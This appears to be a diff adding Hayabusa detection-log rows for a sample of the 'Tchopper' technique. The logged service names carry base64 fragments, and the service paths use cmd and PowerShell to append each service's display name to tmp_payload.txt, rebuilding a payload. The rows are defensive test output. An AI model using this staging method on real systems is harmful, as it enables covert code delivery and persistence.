+2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
